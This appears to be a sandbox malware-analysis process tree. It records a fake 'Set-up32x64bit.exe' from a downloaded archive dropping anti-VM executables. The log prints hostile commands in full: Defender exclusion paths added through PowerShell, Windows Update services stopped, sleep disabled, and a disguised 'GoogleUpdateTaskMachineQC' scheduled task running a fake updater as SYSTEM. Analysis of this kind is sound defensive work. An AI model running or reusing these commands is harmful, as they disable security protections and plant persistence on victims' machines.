  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=6640 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:2696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=6964 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:4504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=6592 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:4656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7300 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:8
  2⤵
  PID:2884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=7424 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:4088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=7456 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=7228 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5928 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8100 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:8
  2⤵
  PID:2064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8184 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:8
  2⤵
  PID:5360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=7828 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=6924 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=7452 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=6432 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=7980 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=1716 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=7240 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=8248 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:2108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=6592 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7952 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:8
  2⤵
  PID:5748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7056 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:8
  2⤵
  PID:5580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=7260 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=7516 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:4952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=8116 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:2608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=7244 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:4172
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=7480 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=8632 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:6068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=8620 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=8612 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:2384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=8984 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=8616 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=8576 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:3628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4460 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:8
  2⤵
  PID:1316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8704 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:8
  2⤵
  PID:1928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7508 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:8
  2⤵
  PID:4088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9008 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:8
  2⤵
  PID:4400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7808 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:8
  2⤵
  PID:4332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=7856 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:3448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=7804 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:4820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=2552 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:3652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=7816 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:1
  2⤵
  PID:5864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7236 --field-trial-handle=1884,i,11454149661950123667,1334802269188305122,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5680

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Loads dropped DLL
PID:3132
- C:\Users\Admin\Downloads\winrar-x64-622.exe
  "C:\Users\Admin\Downloads\winrar-x64-622.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  PID:5796
- - C:\Program Files\WinRAR\uninstall.exe
    "C:\Program Files\WinRAR\uninstall.exe" /setup
    3⤵
    - Executes dropped EXE
    - Modifies system executable filetype association
    - Registers COM server for autorun
    - Drops file in Program Files directory
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:3400
- C:\Program Files\WinRAR\WinRAR.exe
  "C:\Program Files\WinRAR\WinRAR.exe" x -iext -ver -imon1 -- "C:\Users\Admin\Downloads\FILES-S0ft.rar" "?\"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  PID:4412
- C:\Users\Admin\Downloads\FILES-S0ft\Set-up32x64bit.exe
  "C:\Users\Admin\Downloads\FILES-S0ft\Set-up32x64bit.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:2716
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2716 -s 1844
    3⤵
    - Program crash
    PID:6104
- C:\Users\Admin\Downloads\FILES-S0ft\Set-up32x64bit.exe
  "C:\Users\Admin\Downloads\FILES-S0ft\Set-up32x64bit.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:6048
- - C:\ProgramData\95429146528106371072.exe
    "C:\ProgramData\95429146528106371072.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:4392
  - - C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:5364
- - C:\ProgramData\87511596656412869980.exe
    "C:\ProgramData\87511596656412869980.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:3340
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /7
  2⤵
  - Loads dropped DLL
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SendNotifyMessage
  PID:4048
- C:\Users\Admin\Downloads\FILES-S0ft\Set-up32x64bit.exe
  "C:\Users\Admin\Downloads\FILES-S0ft\Set-up32x64bit.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:3244
- - C:\ProgramData\75125060588123477374.exe
    "C:\ProgramData\75125060588123477374.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:3116
- - C:\ProgramData\86241972503253941621.exe
    "C:\ProgramData\86241972503253941621.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:1016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5408
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:492
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1440
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3140
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:116
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4800
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ewltjtjow#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:4992
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:3604
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:2320
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:4564
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:2060
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:4888
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:5672
- C:\Users\Admin\Downloads\FILES-S0ft\Set-up32x64bit.exe
  "C:\Users\Admin\Downloads\FILES-S0ft\Set-up32x64bit.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  PID:2064
- - C:\ProgramData\76363114667566969419.exe
    "C:\ProgramData\76363114667566969419.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:5852
- - C:\ProgramData\08076619808441664900.exe
    "C:\ProgramData\08076619808441664900.exe"
    3⤵
    - Executes dropped EXE
    PID:1052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:4152
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:2576
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4068
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:392
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3120
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4432
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2600
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:928
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:3240
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:1132
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:1848
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:4396
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ewltjtjow#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:2020
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:5548
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1336
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3116
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2224
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1536
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3384
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:6056
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:3752
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:5740
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:5520
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:116
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
